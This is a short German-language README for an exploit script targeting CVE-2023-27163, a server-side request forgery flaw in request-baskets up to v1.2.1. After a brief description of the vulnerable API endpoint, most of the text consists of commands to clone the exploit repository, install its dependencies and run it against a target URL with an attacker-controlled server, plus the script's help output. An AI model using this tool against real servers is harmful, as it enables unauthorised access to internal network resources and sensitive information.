
CVE-2023-27163 Request-Baskets v1.2.1 - Serverseitige Request-Fälschung (SSRF)
Request-Baskets v1.2.1 - Server-Side Request Forgery (SSRF)
Es wurde festgestellt, dass request-baskets bis v1.2.1 eine Server-Side Request Forgery (SSRF) über die Komponente /api/baskets/{name} enthält. Diese Schwachstelle ermöglicht es Angreifern, über eine manipulierte API-Anfrage auf Netzwerkressourcen und sensible Informationen zuzugreifen.
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Exploit-Skript für Request Baskets
Positionsargumente:
url Hauptpfad (/) des Servers (z. B. http://127.0.0.1:5000/)
attack_server ATTACK_SERVER
Optionen:
-h, --help Diese Hilfemeldung anzeigen und beenden